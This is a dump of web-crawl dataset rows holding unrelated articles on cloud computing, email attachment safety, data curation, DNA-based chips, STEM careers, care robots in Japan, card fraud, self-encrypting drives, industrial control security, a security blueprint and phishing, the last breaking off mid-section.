text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
Cloud computing has been trending in the IT industry and has many advantages including lowering costs and improving flexibility, efficiency, and scalability. There are different types of cloud computing, each with different benefits, so choosing the type that best meets your organization's needs will set you up for success. But first, you need to understand what these options are and how they work.
What is Cloud Computing?
In contrast to using local servers or hardware, cloud computing is the use of remote servers to store and manage data. Cloud computing provides servers, data storage, databases, networking, software, analytics, and intelligence almost immediately. These services are accessed through the internet, enabling the user to have access from multiple devices, giving more flexibility. Since it also allows people to easily share data, cloud computing nurtures collaboration. If a power outage or technological malfunction occurs, having an external server allows the company to recover their data, which could have been lost if the hardware was damaged.
What are the Different Types of Cloud Computing?
Public clouds - Public clouds, like Google Drive and Microsoft Azure, are the most common type of cloud computing; it gives the public access to resources through the web. Public clouds are not owned by the user, but rather by a third-party organization that develops virtual space. This organization manages and maintains the cloud. The consumer usually pays by the hour or by the byte, but some public clouds are free. Public cloud computing leads to
- higher security and performance
- lower costs
- wider availability of infrastructure, services, and applications
Private clouds - Private clouds are reserved for one business, and it is isolated from other users. All costs are managed by the company using the private cloud. This could be useful for companies who are unable to switch to public clouds because of security concerns, budgets, or regulations. In the healthcare and financial services industries, the features private clouds offer are particularly useful. Private cloud allows the company to customize the cloud to best suit their needs. Private clouds can provide benefits, such as:
- increased infrastructural capacity for large compute and storage demands
- on-demand services
- efficient resource allocations
- increased visibility into resources
Hybrid clouds - Hybrid clouds combine elements of both private clouds and public cloud solutions with integrated infrastructure. This allows the business to combine the best elements of the models. The two different clouds still have integration between them. The benefits of hybrid cloud include
- government and regulatory compliance
- offers stability and flexibility
- costs are lower than private clouds
Multicloud – Multi-cloud refers to one company using many unaffiliated clouds. Why would they do this? Oftentimes, specific features are limited to specific clouds, so to enjoy all these features, the company needs multiple clouds. Also, if one cloud provider loses the data or ends its operations, multiclouds provide companies with a backup cloud. Through multicloud, companies use apps, resources, microservices, and containers from multiple cloud providers. There are many benefits to multicloud models:
- boosting performance
- avoid vendor lock-in
- enhance resilience
Cloud computing is a worthwhile investment for a business that makes data storage more convenient. The different options allow for flexibility that empowers the company to choose the best cloud type for their needs. If you would like to learn more about cloud services and Kraft’s managed IT services, contact a Kraft IT Expert to schedule your free consultation today. | <urn:uuid:449612c4-c124-4204-9dc7-794e6de648db> | CC-MAIN-2022-40 | https://blog.kraftbusiness.com/what-are-the-four-main-types-of-cloud-computing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00565.warc.gz | en | 0.938726 | 701 | 3.09375 | 3 |
Why is understanding emails an important part of Cyber Security?
To put it simply, emails can be dangerous. They are one of the more basic and most effective ways of entering the enclosed networks of most companies. While effective anti-malware practice can prevent attachments from causing devastating effects, a lot of Spam and malicious emails rely on unwitting employees to gain access to important and sometimes vital aspects of a business’ core systems.
Whilst reading the contents of emails is usually safe, the attachments within can pose a real threat. One of the most effective methods of preventing malicious activity is education. This guide covers what to look out for from email attachments, the sender and the content of the email as well as tips on good email practice.
So what should you look out for with Email Attachments?
The Attachment Extension
One of the easiest ways to identify whether an attached file is dangerous is by the file extension (the last few characters after the “.”, which will tell you what type of file the attachment is. It is essential that no files with an “.exe” file extension are opened, as it indicates the attachment is a Windows executable program which could provide unrestricted system access if installed. .exe files aren’t the only dangerous file extension, other potentially dangerous file extensions include:
There are many more and the list goes on forever. If you don’t recognise the file format – Do Not Open. Your IT team should never send you executable files, let alone any external parties. It is also important to understand that it is possible for the sender to change the extension of a file in order to disguise its true identity. | <urn:uuid:86f0abda-c795-4d8b-881f-ef1bcab00e3f> | CC-MAIN-2022-40 | https://www.intaforensics.com/2016/11/25/a-guide-to-email-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00565.warc.gz | en | 0.935704 | 384 | 2.984375 | 3 |
A Brief History of Curation
A Brief History of Curation
Curation provides a solution to the problems engendered by big data — by surfacing quality over quantity
Broadly speaking, curation can be defined as “The act of organizing and maintaining a collection (such as artworks, artifacts, or data)”. As a society, we have a long history of curating content. The first examples of curated content emerged in Renaissance Europe, five centuries ago, in the form of newsletters. Handwritten newsletters circulated privately among merchants, passing along information about everything from economic conditions to social customs. The newsletter editor himself decided what information was the most important and most relevant, organizing and distributing that knowledge for public consumption.
Newsletters eventually matured into full-fledged newspapers. By the 1850s, publications such as the New York Times became the go-to source of news for information consumers. The editor served as an expert curator for consumers, determining what content was most factual, relevant and interesting for the masses. The newspaper editor wore the hat of content governor for consumer information.
In 1996 the Internet took off and the New York Times went from a single printed edition to delivering two editions – one online and one offline publication. This change required organizational changes to adapt the New York Times to a world disrupted by new communications technology. The paper expanded their curation team from one editor to multiple editors and evaluated whether to merge or differentiate the online and offline publications. Eventually the popularity of online content pushed the New York Times to expand their notion curation. No longer were expertly curated articles enough. There was a place for non-expert curation in the form of crowd-sourced content. The online edition of the New York Times introduced specific areas of the publication where aggregated content was curated according to popularity signal. Readers could easily find the “Most Emailed” and “Most Viewed” articles in sections of the paper devoted to communicating what content their readership was engaging with deeply.
Social media and crowd-sourced creation
Around the same time, social networks like Twitter, Pinterest, and Facebook introduced self- service techniques for content curation. On those platforms, individuals found published articles of interest or created their own content and shared it with their personal network of consumers. Features such as the “like” button allowed for social feedback on the appropriateness and value of the content shared.
In the modern world of crowd-sourced and socially curated content, there is always a risk that consumers accept anything online as fact. This presents a difficult challenge: How does one know what information online is accurate and what is not?
This leaves space for both expert curators to continue to play an important role in communications technology and for new features to be introduced that ensure information validity and maintain accuracy. One example is the use of annotations on a Wikipedia page with unknown sources. Annotations indicate the information on the page may not be accurate or needs updating but still allow for that content to be distributed.
From newspapers to social networks (such as Twitter, Pinterest, and Facebook), the introduction of new technologies has both introduced new methods of curation and expanded the breadth of individuals deemed fit to be curators.
In part two of this article, we’ll take a look at how there is now a growing demand to curate data and how the lessons learned from past curation can be applied to organizations struggling to deal with a huge influx of data. | <urn:uuid:3036ad82-6f82-4f94-b53b-936e73316e35> | CC-MAIN-2022-40 | https://www.alation.com/a-brief-history-of-curation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00565.warc.gz | en | 0.943635 | 707 | 3.40625 | 3 |
IBM researchers are turning to DNA to create even smaller and more powerful computer chips.
IBM announced Aug. 17 that its scientists, teaming with others at the California Institute of Technology, are working on ways in which DNA molecules can be used to create a scaffolding onto which tiny circuits can be built.
The millions of carbon nanotubes could be put onto the scaffolding and then would self-assemble into precise patterns by sticking to the DNA molecules. Those nanotubes would form the basis for transistors in processors.
The announcement comes as the semiconductor industry-including IBM and Intel-looks for ways to continue shrinking processors beyond the 22-nanometer limit, and the new advancements by IBM and CalTech hold the promise of enabling the companies to put more power and speed into smaller packages. These chips also will be more energy-efficient and less expensive to manufacture than current offerings, according to IBM.
Currently, chip makers are using 45-nm manufacturing processes and are moving toward 32 nm. As the trend moves to 22 nm and smaller, the challenges of performance, speed, energy efficiency and cost grow along with the technological challenges.
“The cost involved in shrinking features to improve performance is a limiting factor in keeping pace with Moore’s Law and a concern across the semiconductor industry,” Spike Narayan, manager of IBM Research’s Science and Technology business, said in a statement. “The combination of this directed self-assembly with today’s fabrication technology eventually could lead to substantial savings in the most expensive and challenging part of the chip-making process.”
CalTech had developed the ability to have single DNA molecules self-assemble in response to a reaction between a long single strand of viral DNA and a concoction of short synthetic oligoneculeotide strands. The shorter segments fold the DNA into the desired shape, and can be modified to act as places for nanoscale components to attach, according to IBM Research.
Through this method, the nanostructures can be put into such shapes as squares, rectangles and triangles.
IBM and CalTech researchers will be publishing a paper on their work in the September issue of Nature Nanotechnology. The paper currently can be seen here. | <urn:uuid:e1ee19b2-85b2-476f-ac00-567fc7ce09b6> | CC-MAIN-2022-40 | https://www.eweek.com/networking/ibm-caltech-use-dna-for-future-microchips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00565.warc.gz | en | 0.951969 | 461 | 3.828125 | 4 |
Many people have heard of the STEM program but not everyone knows exactly what it entails. STEM is a curriculum based on the idea of educating students in four specific and critical areas — science, technology, engineering, and math — however, STEM does not separate these subjects to be taught individually, rather they are integrated into a cohesive program that teaches the subjects together as compliments to one another. One key point that the program is praised for is its use of real-world applications to train these students for their future careers — making it one of the most successful programs resulting in some of the best-prepared students facing the workforce upon graduation.
More often than not, people think of high school or even college as the starting point for such technical and complex education to begin, but many schools have incorporated STEM into classes to some degree from kindergarten on up through high school! Of course, it is much more basic at the lower grades, but by including it in the curriculum in students’ education from the beginning and adding to it incrementally as they grow, students will be much more interested in the subjects included in STEM. In addition to this, they will be able to notice the correlation between these subjects, which will possibly result in higher numbers of these individuals choosing STEM-related careers. As you can see to the left, 58% of people currently working in STEM decided on this career path prior to graduating high school, meaning that early teaching is critical in creating future workers interested in STEM.
STEM is the second fastest-growing industry, second only to healthcare, with an expected 8.6 million jobs available in the field by 2018. Not only are graduates of STEM-related majors some of the highest paid young professionals right out of college, but they also get those high-paying jobs rather quickly following graduation. While these facts may be enticing, it is important for individuals to know about some of the potential successful careers they could have in their main area of interest when it comes to STEM.
Science & Engineering
Science and engineering careers are the most related when it comes to the workforce and make up 6 of the top 10 careers in STEM including civil engineering, environmental engineering technology, nuclear engineering technology, computer engineering (also related to technology), petroleum technology, and marine sciences. Among the requirements for these careers are strong problem solving skills, chemistry, basic math skills, and deductive and mathematical reasoning.
Mathematics itself, while an integral element in each of these careers, is not well represented in this top 10 list, making up only one of the listed STEM jobs. Despite this face, Mathematics encompasses a multitude of industries such as statistics, actuarial sciences, economics, and more that differentiate it from its fellow STEM categories. Required skills for mathematically related jobs include deductive and mathematical reasoning, problem solving skills, and facility with numbers. If you love numbers and are interested in STEM, this might be the career path for you.
While science, engineering, and mathematics combine to make up the majority of the top jobs in STEM, technology is one of the fastest growing of these already rapidly rising industries and it affects its STEM counterparts significantly.
Advancements in existing technology, like smart-phones and computers, as well as the development of new technologies, such as IoT devices and connected car security, make it very apparent that a career in technology has a bright outlook for the future. Jobs are becoming much more technical now and require a better understanding of technology, so STEM programs have been more heavily emphasizing this segment of STEM in recent years.
Of Monster’s top 10 most valuable STEM careers, there are four related to technology: computer and information services, computer engineering (also related to engineering), computer programming, and the #1 most valuable STEM career: information technology. For these careers, there are multiple job titles including Information Security Analyst, Computer Systems Analyst, and Web Developer, among others. These jobs not only require knowledge of the latest technology, high analytical and developmental skills, and logical thinking, but a person seeking one of these jobs must be goal-oriented, passionate, and dedicated to advancing technology and growing the industry as he or she rises throughout a career in tech.
A common misconception about STEM is that it is all about the technical and analytical side of these complex careers, but STEM workers are also creators, innovators, and ground-breakers for the futures of each of their industries. Another fallacy surrounding STEM is that a student must receive traditional training and education in order to gain a successful career in STEM; however, there are alternative ways into a career in these fields.
Alternative Routes to a career in STEM
Many people may look at the training and schooling necessary to attain a STEM-related degree and think that it is not affordable for them or the resources necessary to achieve such certifications required for their future careers are out of reach; however, there are companies out there that try and alleviate these fears by offering alternative routes for those individuals who are interested in a career in technology, but choose to go a different route to get there.
Axiom had the privilege earlier this year to work with IT Works, a Tech Impact program that offers free, immersive IT training to young adults– motivated high school graduates, age 18-26 years old, who have not yet completed a Bachelor’s degree. As part of the 16-week training program, an IT Works student named William Lewis, completed a 5-week internship with Axiom and you can read about his experience interning for Axiom through IT Works here. A career in STEM is not necessarily about going to the highest ranked technology school, but being motivated enough to find your own way to where you want to be in your career, with them help of some companies out there who can get you where you’re headed.
In case you’re still on the fence as to whether or not STEM education and careers are important, the National Science Foundation has this to say on the subject:
“In the 21st century, scientific and technological innovations have become increasingly important as we face the benefits and challenges of both globalization and a knowledge-based economy. To succeed in this new information-based and highly technological society, students need to develop their capabilities in STEM to levels much beyond what was considered acceptable in the past.”
With such a revolution in science, technology, engineering, and mathematics, the modern world is in great need of such advanced, pioneering minds as those interested in having an impact on these crucial subjects.
If you’re interested in learning more about STEM careers, please contact Axiom at https://axiomcyber.com/ to speak to one of our IT professionals about a career in tech. If you are in need of a different route of gaining technological experience and qualifications, please visit http://techimpact.org/ to learn more about their available programs for innovative and motivated individuals.
Hailey R. Carlson | Axiom Cyber Solutions | 9/16/2016 | <urn:uuid:afad1337-abe2-4af8-a76a-eb046bae96e5> | CC-MAIN-2022-40 | https://axiomcyber.com/cybersecurity/s-t-e-m-careers-growing-towards-the-future/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00565.warc.gz | en | 0.965452 | 1,439 | 3.359375 | 3 |
As a global leader in all things autonomous, it’s no surprise that Japan is looking to robotics to revolutionise social care. But in such a sensitive sector, the barriers to mass adoption may be psychological as much as technological.
The number of people in Japan aged 65 or older is expected to reach more than seven million by 2025. By that same point in time, the country predicts a shortfall of 370,000 caregivers. So in pure mathematical terms, a workforce of robots ready to fill the void has obvious potential.
However, the greatest challenge is likely to be encouraging communities to embrace the technology.
Relying on robots to restore independence
Robots have the potential to ease the burden on overstretched social care staff by restoring elderly citizens’ autonomy, believes Dr Hirohisa Hirukawa, director of robot innovation research at Japan’s National Institute of Advanced Industrial Science and Technology.
“Robotics cannot solve all of these issues; however, robotics will be able to make a contribution to some of these difficulties,” he said.
But there is still much to be done, as outlined in Japan’s overarching Robot Strategy. The report proposes that four out of every five care recipients will have some form of robotic support by 2020.
Currently, robots designed to help lift people in care facilities have been deployed in just eight per cent of the country’s nursing homes, for example.
Hirukawa sees plenty of room for improvement, both in terms of reducing the cost of the technology and fostering an atmosphere of acceptance towards it.
“The mindset of the people on the frontline of caregiving is that it must be human beings who provide this kind of care,” he said. “And on the side of those who receive care, of course initially there will be psychological resistance.”
Among the priorities for Japan’s social care robot development are lifting aids, mobility aids, wearable devices, and bots to support bathing and getting dressed.
Situational robots are preferred to all-around helpers. For example, one robotic mobility aid demonstrated by Hirukawa has built-in sensors that read the lie of the land. In this way, an elderly user could be assisted when on a steep incline, for example, while an automatic brake could help to reduce falls when going downhill.
Plus: Wearable MRI offers speedy brain scans
In related medical news, San Fransisco startup Openwater has unveiled a wearable device capable of scanning the brain with a resolution a billion times higher than traditional MRI machines.
The device has been designed to fit inside a simple hat and relies on optoelectronics to build a picture of the brain.
Openwater’s stated ambition is for the device to track the flow of oxygenated blood to different parts of the brain and, eventually, to read thoughts in real time.
Internet of Business says
As Malek Murison explains, some of the barriers to robotic social and healthcare are local, cultural, and psychological, and there are risks in dehumanising the ways in which we look after vulnerable people.
But there are global reasons for automating some aspects of care, too. Japan is just one of a number of countries that are exploring the use of robotics, AI, and assistive technologies to help support an ageing population. In the UK, for example, the 65+ population will increase from 12 million today to 17 million by 2035. At the same time, investment in social care is falling in real terms by one-third. This is why robotic systems could complement human workers in the long term – despite the prohibitive costs at present.
Other technologies, such as autonomous vehicles, could help elderly or physically disabled people to lead more independent lives, outside of the traditional care system.
But first, specialist robots must overcome some serious technological challenges to work in health and social care. Among these are scene awareness, social intelligence, communication, data security, safe autonomy, safe failure, cleanliness, and validation by medical authorities. Last year, UK-RAS, the UK’s umbrella organisation for robotics and autonomous systems research, published an excellent white paper on the subject, which you can find here. | <urn:uuid:5d064278-1ef7-4f1f-a790-1243322617b3> | CC-MAIN-2022-40 | https://internetofbusiness.com/robots-japan-social-care/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00565.warc.gz | en | 0.938029 | 862 | 3 | 3 |
By Dr. Manfred Mueller and Louis Modell
Credit card fraud is as old as credit cards themselves. Since the introduction of the first plastic Diners Club card in the early 1950s, things have evolved rapidly.
Credit card fraud is a wide-ranging term for theft and fraud committed using or involving a payment card, such as a credit or debit card, as a fraudulent source of funds in a transaction. The purpose may be to obtain goods without paying, or to obtain unauthorized funds from an account. For a broad set of consumers and merchants, they correlate the rise in credit card fraud online with identity theft. In reality, identity theft is one of the oldest scams in the book. Identity theft simply offers fraudsters another way to commit crimes and to hide them from detection.
Card Not Present (CNP)
The Internet and mail post are the major routes for fraud against merchants who sell and ship products and severely affect legitimate mail-order and web merchants. If the card is not physically present (referred to as card not present or CNP) the merchant must rely on the holder — or someone purporting to be — to present the information indirectly, whether by mail, telephone, or over the web. While there are safeguards in place, it is still more risky than presenting in person, and card issuers tend to charge a greater transaction rate for CNP because of the greater risk.
How Has the Internet Changed the Rules?
Thanks to the Internet, fraud scams are more efficient. The fraudster doesn’t have to travel to physical stores, or potential marks, to test or use stolen credit cards. They are, in effect, invisible criminals, masking themselves by faking the data points they send and making it easier for them to abuse banks and businesses. On the Internet, there is no live communication with a consumer. If the data looks suspicious, you have to either reject the order outright, accept it with the risk of fraud, or have someone investigate the order and try to get back in touch with the consumer — all very costly. At the same time, consumers doing business online expect fast turnarounds on their orders. So how can a merchant ever expect to win? | <urn:uuid:8e9e134f-2c84-45fd-beba-e96d2734dd6b> | CC-MAIN-2022-40 | https://www.identiv.com/community/2017/07/26/rise-potential-fall-fraudulent-card-not-present-cnp-transactions-part-1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00565.warc.gz | en | 0.946246 | 448 | 2.65625 | 3 |
What is an SED?
Drive Trust Alliance Definition of an SED:
- The device uses built in hardware encryption circuits to write and read data in and out of a non-volatile storage device such as a hard drive or a flash drive.
- At least one Media Encryption Key (MEK) is protected by at least one Key Encryption Key (KEK, usually a “password”).
- If one or more KEKs have not decrypted the MEK, the data that the MEK encrypts is not available to read or write. You cannot reverse engineer a locked SED without a valid KEK input from outside of the self-protecting SED.
SEDs are already ubiquitous worldwide
A well-kept secret is that SEDs are among the most successful and ubiquitous data leak protection security and privacy products in the world.
They are everywhere, but so easy to use once you set them up, you almost never see them or know they are working their magic. Note, 100% means 100% market penetration, ~100% means "approximately 100% market penetration". The comment is why the adoption took place.
- ~100% of all new, office and enterprise quality, Solid State Drives (SSDs) are TCG Opal SEDs
- Due to the Data Sanitization Problem for Flash
- ~100% of all Enterprise Storage (SSD, HDD, etc) are TCG Enterprise SEDs
- All of Google's Storage of your data and data they have on you, for instance.
- For fast, safe, and effective cryptographic repurposing and disposal of storage devices to protect against data leakage
- 100% of all Apple iOS devices are hardware SEDs for user data
- when iPhone or iPad password is set, that is the KEK
- ~100% Western Digital USB Hard Disk Drives (HDDs) are SEDs
- In case you lose your USB storage device
- ~100% of ALL Office-Class Printers and Copiers in the world use SEDs
- To protect against theft of what people have printed
- Much smaller number of Personal HDDs are TCG Opal or SED
- But Microsoft Bitlocker supports “eDrive” which requires Opal 2.0 SEDs
- 100% TCG Opal Drives also support the SATA Security Password (Hard Disk Password)
- No Software needed: already supported by BIOS/UEFI setup on nearly every laptop and PC in the world
- The newest fastest solid state drives, such as NVMe, and many other types of non-volatile storage devices are already commercially available as TCG SEDs, but standardization details are currently being handled by the TCG Storage Workgroup right now.
- Ease of use: Integral part of the drive electronics; security added IN, not ON.
- Transparency: comes from the factory already encrypting; no ON/OFF.
- Performance: operates at full drive speeds; no work slowdown.
- Efficacy: Gets the job done. SEDs are a mature and time-tested technology.
- Scalability: Already proven to scale smoothly from individual use to the largest distributed data centers in the world (e.g., Google).
Count all those SEDs up. That's right...
Billions of people use SEDs all the time and don't even know it, This includes you, right now. And the population of SED devices in the world is easily approaching a billion.
If you are not using SEDs right now for yourself or your organization, you should. | <urn:uuid:ecf7fb31-d509-4815-aef4-690b50ea6020> | CC-MAIN-2022-40 | https://www.drivetrust.com/education/education/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00565.warc.gz | en | 0.918757 | 770 | 3.28125 | 3 |
It is no secret that humans make mistakes. In order to reduce the damages and harms caused by human error, cyber security is a must for industrial control systems. Keep reading to learn more.
Unfortunately, humans make mistakes. There are many reasons behind this fact, such as the limited capacity of our working memory or our short attention span. Regardless of our experience, no matter how well trained we are, we all make mistakes, and it is okay. Mostly. Sometimes, human error leads to serious consequences and causes harm. In order to avoid such situations, implementing industrial control systems is essential. In this article, we will discuss what industrial control systems and how they can be kept safe. Keep reading to learn more!
What are industrial control systems?
Industrial control system (abbreviated as ICS) is an umbrella term that refers to the supervisory control and data acquisition (also known as SCADA) systems, programmable logic controllers (also known as PLC), distributed control systems (also known as DCS) and such.
Industrial control systems aim to streamline various business practices related to industrial production but most importantly, they reduce the human error rate by optimization. Industrial control systems are often employed in critical industrial facilities like thermal plants, power generation, heavy industries, distribution systems, nuclear plants and water treatment facilities.
Why are industrial control systems necessary?
As we have mentioned before, human error is almost indispensable. In order to alleviate the stress and reduce the risks related to human error, industrial control systems were developed.
Industrial control systems aim to offer distributed control, process automation and process monitoring.
With distributed control, it is possible to reduce vulnerabilities and risk factors associated with industrial production. Moreover, the efficiency benefits greatly from it.
Process automation allows the employees to work faster and get more job done in a given time. Moreover, it allows the production of better quality materials and significantly lowers the production costs.
And finally, process monitoring is necessary to make sure that everything goes smoothly. It allows the supervisors to control the production processes and make adjustments when necessary.
Why we need cybersecurity for industrial control systems?
The history of industrial control systems go very back, well before the Internet of Things and similar technological developments. As a result, industry control systems were designed to operate in a highly isolated and controlled area. Initially, industry control systems were only connected to the other systems within the same factory or plant. For this purpose, specialized control mechanisms and communication protocols were created. Yet such mechanisms and protocols cannot meet the requirements of today’s business environments and they don’t cooperate well with recent technologies like big data analytics and the Internet of Things (IoT). In order to update industry control systems to meet the current needs of the businesses, real time data and enterprise networks are introduced.
Real time data and enterprise networks can do wonders for an industry plant or a factory, but they also bring new vulnerabilities as well. That is why cyber security for industry control systems is a must. Thorough and carefully planned cyber security measures are essential for protecting plants and factories from external disruption, data breaches and serious catastrophes. | <urn:uuid:9d788c3b-5ff5-4f59-9df1-2ba851ce1766> | CC-MAIN-2022-40 | https://www.logsign.com/blog/cyber-security-for-industrial-control-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00765.warc.gz | en | 0.944941 | 641 | 3.0625 | 3 |
Threats to information technology infrastructures are becoming increasingly sophisticated, with malicious applications, weaponized email attachments, and socially engineered malware all growing in both number and capability. Organizations must take a multi-layered approach to detecting and defending against attacks and intrusions in this changing threat landscape, and there are key security measures every company should employ to develop and maintain strong security.
This is a blueprint of the minimum recommended technologies that, when properly implemented, reduce overall risk, regardless of which manufacturer you choose for each technology.
Traditional firewalls can perform the most basic gatekeeping tasks including opening and blocking ports, translating network addresses, and governing outbound traffic.
Many of today’s threats, however, can evade these safety measures, creating the need for more advanced firewall functionality. A next-generation firewall enhances primary protection capabilities and provides more thorough security with a number of sophisticated features including:
- Intrusion prevention systems that continuously monitor networks for interference with normal traffic, security breaches, and other undesirable activities.
- SSL and SSH inspection that identifies and blocks connections established by malware for the purpose of uploading sensitive data or downloading harmful material. Additionally, more and more sites are defaulting to HTTPS reducing the amount of traffic a traditional firewall can see without being able to inspect SSL traffic.
- Anti-malware protection that’s connected to a constantly updated global threat center.
- Application awareness that analyzes the traffic generated by each application to identify abnormalities.
Although a username and password are two of the most common forms of authentication, the rise of security breaches in recent years has proven that they simply are not enough. In part, this is because of weak password practices and using only one class of credentials, in this case, knowledge.
Authentication factors are distinct categories of credentials that can, alone or together, verify the identity of a user. The two basic classifications include knowledge factors, or something the user knows such as security questions, usernames, and passwords, as well as possession factors, or something the user has, such as a key card. The third category of authentication is inherence factors, which are things that are unique to the user including biometrics such as fingerprints. The most advanced systems monitor and analyze the times a user interacts with the system and the locations from which he does so as additional factors.
Two-factor authentication is most useful when the factors come from two different categories. Using this approach offers greater protection from theft of credentials and reduces the risk of a breach from phishing and social engineering schemes.
Secure Mobile and Remote Access
Businesses are also tasked with protecting resources on virtual networks when users need to access them from outside of the organization. While the firewall often handles this duty, it may not be sufficient beyond about 50 concurrent VPN users.
In these cases, organizations should look into a VPN concentrator. This virtual or physical device is a dedicated VPN gateway outside of the router or firewall that focuses specifically on mobile and remote access and traffic.
It’s equally important to ensure proper authentication of the mobile devices used to access a network so two-factor authentication is highly recommended. Biometric methods work especially well on mobile devices, with many being capable of fingerprint, facial and voice recognition as well as iris scanning. GPS can also be used to verify the user’s location, creating a simple but effective two-factor authentication protocol.
With email phishing and attachment-based ransomware on the rise, filtering malicious emails before they even appear in the inbox is the first step in email security. Incoming emails can be scanned for indicators of social-engineering designed to trick the receiver into revealing sensitive information.
Once threats are detected, they can be quarantined or otherwise rendered harmless. Links within emails can be monitored as well with applications that examine the URLs and the sites they point to. If malicious sites are discovered, the system prevents users from even opening the links.
Advanced Persistent Threat Detection
Advanced Persistent Threats utilize stealth to evade security barriers including anti-malware programs and firewalls. APTs can cause considerable damage as they are engineered to work quietly in the background over long periods of time, gathering and sending information as well as destabilizing the IT infrastructure to allow more malware through.
Sandboxes and emulators can help fight against these silent attackers by creating a virtual environment that seems just like the real thing and placing suspicious applications into them before they can reach the actual IT structure.
These tools then monitor the activity of the applications for signs of rogue behavior and quarantine any malicious items.
Data Protection and Encryption
Implementing proper file, folder, and hard drive encryption policies not only reduces the risk of data being accessed and extracted by unauthorized parties but renders the information unreadable even if it is exfiltrated. Depending on the type and scope of data that needs to be protected, encryption can be applied via hardware and operating system services, dedicated applications, or drivers.
Users will not be able to read the data without the proper credentials, which should include at least two authentication factors.
Identity Management and Governance
Monitoring and protecting superuser and admin accounts for servers, databases, VMware/Hyper-V consoles, SaaS applications, and other parts of an organization’s IT environment requires effective privileged identity management. PCI DSS 3.2 can add multi-factor authentication as a requirement for any personnel with non-console administrative access to the systems handling card data so that a password alone is not enough to verify the user’s identity and grant access to sensitive information.
Developing a reliable identity governance policy to centralize orchestration of user identity management and access control is also key. With proper active directory practices, businesses will ensure that only current employees are active and that those employees only have permissions specific to their job role.
This can also verify that the activity is originating from expected regions or IP locations.
Implementing this blueprint will help provide a good foundation and structure, but are by no means the final result. Proper configuration, monitoring, and patching are still critical practices to ensure your tools are properly working. Additionally, the education of your associate is a great next step.
However, with these suggestions properly in place, you will have greater visibility into your environment, stronger access control, and the ability to then make strategic additions as necessary for your specific environment.
Ready to up your security game?
Our security experts are here to help you every step of the way. Connect with us to start developing the right blueprint for your organization. | <urn:uuid:9b8db340-05d8-43fa-99b2-40c27c15b4c3> | CC-MAIN-2022-40 | https://microage.com/blog/security-architecture-blueprint/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00165.warc.gz | en | 0.932246 | 1,363 | 2.71875 | 3 |
Worry less while driving! Autonomous cars utilize Machine Learning to detect potential hazards and alert the driver to minimize risks while on the road. The car is able to identify roadway lanes and types, other cars, pedestrians and cyclists in its surrounding.
In this video, we showcase how the car senses and alerts the driver while travelling on busy highways and through winding roads. This model was created with Python Libraries such as CNN, TensorFlow and OpenCV.
Insights Hub is a video series brought to you by Miracle's Data Practice. For more videos please visit http://www.miraclesoft.com/insighthub | <urn:uuid:778c6066-e11c-4455-9c79-922a23297f3b> | CC-MAIN-2022-40 | https://uat.miraclesoft.com/library/video/autonomous-car-ai-powered-vehicle-using-machine-learning | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00165.warc.gz | en | 0.946613 | 129 | 3.25 | 3 |
What Is Phishing?
Are you sure it was your bank that just emailed you? Can you feel confident that you’re clicking on a safe link? Or are you about to become the latest victim of a phishing scam?
Phishing is a creative attack that's been fooling people for years. A successful phishing attack can put your data and your money in the hands of criminals and leave your devices riddled with malware and viruses.
Here’s everything you need to know about how to spot phishing scams and how to protect yourself against them.
What is phishing?
You can probably guess where the name comes from. The word “phishing” is a reference to the way in which the scam is carried out: baiting, luring, and reeling in a victim. The criminal is holding the rod, and yes, you’ve guessed it – you're the fish.
There are several different kinds of phishing techniques. The most common methods involve email, although in more elaborate phishing attacks, that is just the start.
For phishing emails, disguise is essential. The criminal will pose as a trusted contact, a friend, or a legitimate company. They'll dress their message up accordingly, with an eye-catching subject line and all the trappings of a genuine email.
Types of phishing
Here are three of the most common types of phishing.
Perhaps the most famous iteration of direct extortion is the so-called “Nigerian Prince” scam. It relies on the criminal starting a conversation with the victim and eventually convincing them to transfer money. This often involves the attacker, in the guise of a wealthy man overseas, promising a massive payoff in return for a “small” investment of funds.
In recent years, some criminals have started targeting people through dating apps. After gaining trust and convincing the victim of their genuine interest, phishers can create a false scenario in which they urgently need money.
Admittedly, awareness of these scams has increased in recent years, so fewer people are falling victim.
In some phishing scams, that initial email is just the starting point for a more elaborate crime.
The setup is the same as the dangerous link email, but in this case, the link will take potential victims to a webpage specifically designed by the criminal. This page will use the same theme and disguise as the email. If someone is pretending to be your bank, asking you to reset your login details, the page will mimic the colors and layout of that bank.
Then, if you end up inputting the requested data – passwords or card credentials – the information will be unencrypted and visible to the criminal.
Types of phishing attacks
Phishing attacks come in a variety of shapes and forms. The main difference between most types of phishing attacks is the medium over which they are carried out. Here are some of the most common types.
Email phishing is arguably the most common type of phishing. As the name suggests, the attack is carried out via email. Usually, emails crafted by bad actors imitate legitimate sources to fool unsuspecting users into giving up their sensitive information.
The essential difference between spear phishing and other types of phishing attacks is that in a spear phishing attack, the bad actors focus with high precision on a single target. In most instances, the targets are specific people or organizations.
